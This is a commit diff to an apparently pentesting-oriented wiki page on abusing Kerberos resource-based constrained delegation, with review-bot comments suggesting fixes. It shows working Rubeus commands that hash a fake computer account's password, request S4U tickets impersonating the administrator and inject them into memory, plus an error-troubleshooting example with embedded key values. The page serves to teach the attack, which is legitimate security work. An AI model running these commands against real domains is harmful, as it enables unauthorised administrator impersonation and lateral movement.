GitBook: [master] one page modified

CPol 2021-01-04 10:44:22 +00:00 committed by gitbook-bot
parent 7df6e7df6d
commit 5ecad1971c
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF


@ -66,7 +66,7 @@ Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
```bash
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER /domain:domain.local
.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local
```
This will print the RC4 and AES hashes for that account.
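Review bot: The sentence above the command ("so we need the hash of that password") does not say why the trailing `$` in `/user:FAKECOMPUTER$` is required, so a reader can still drop it when adapting the command. Add one sentence there stating that the computer account name must include the `$`, matching the `preauth_failed` entry added further down in this commit. Separately, the fence is tagged `bash` while the command is a Windows `.\Rubeus.exe` invocation; a tag that matches the shell actually used would be clearer.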
@ -78,6 +78,12 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
![](../../.gitbook/assets/b3.png)
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
```bash
> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:cifs,time,host,http,winrm,rpcss,ldap /domain:domain.local /ptt
```
### Accessing
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
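Review bot: The command in the new `/altservice` block starts with `> /impersonateuser:administrator ...` and omits the `rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash>` prefix, so it cannot be run as written, and inside a fence tagged `bash` the leading `>` reads as a redirection. Either give the full command line or mark the elision explicitly (for example with a sentence saying these arguments are appended to the previous `s4u` command). Also note that "The last command line" under "### Accessing" now points at this truncated `/altservice` snippet rather than the full `s4u` command it originally referred to; rewording it to name the command would keep the reference unambiguous.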
@ -89,6 +95,12 @@ ls \\victim.domain.local\C$
![](../../.gitbook/assets/b4.png)
## Kerberos Errors
* **`KDC_ERR_ETYPE_NOTSUPP`**: This means that kerberos is configured to not use DES or RC4 and you are supplying just the RC4 hash. Supply to Rubeus at least the AES256 hash \(or just supply it the rc4, aes128 and aes256 hashes\). Example: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
* **`KRB_AP_ERR_SKEW`**: This means that the time of the current computer is different from the one of the DC and kerberos is not working properly.
* **`preauth_failed`**: This means that the given username + hashes aren't working to login. You may have forgotten to put the "$" inside the username when generating the hashes \(`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`\)
## References
{% embed url="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html" %}
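Review bot: The example in the `KDC_ERR_ETYPE_NOTSUPP` bullet uses `s4u /user:FAKECOMPUTER` without the trailing `$`, which contradicts both the `preauth_failed` bullet two lines below and the `s4u /user:FAKECOMPUTER$` form used earlier on the page. Change it to `/user:FAKECOMPUTER$` so the troubleshooting section does not reproduce the mistake it warns about. The same example also hardcodes concrete key values and the host `CIFS/M3DC.M3C.LOCAL` where the rest of the page uses placeholders such as `<AES 256 hash>` and `victim.domain.local`; switching to the placeholders would keep the page consistent.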